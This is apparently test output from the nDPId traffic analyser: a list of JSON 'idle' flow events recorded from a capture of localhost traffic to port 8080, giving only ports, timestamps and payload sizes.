-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 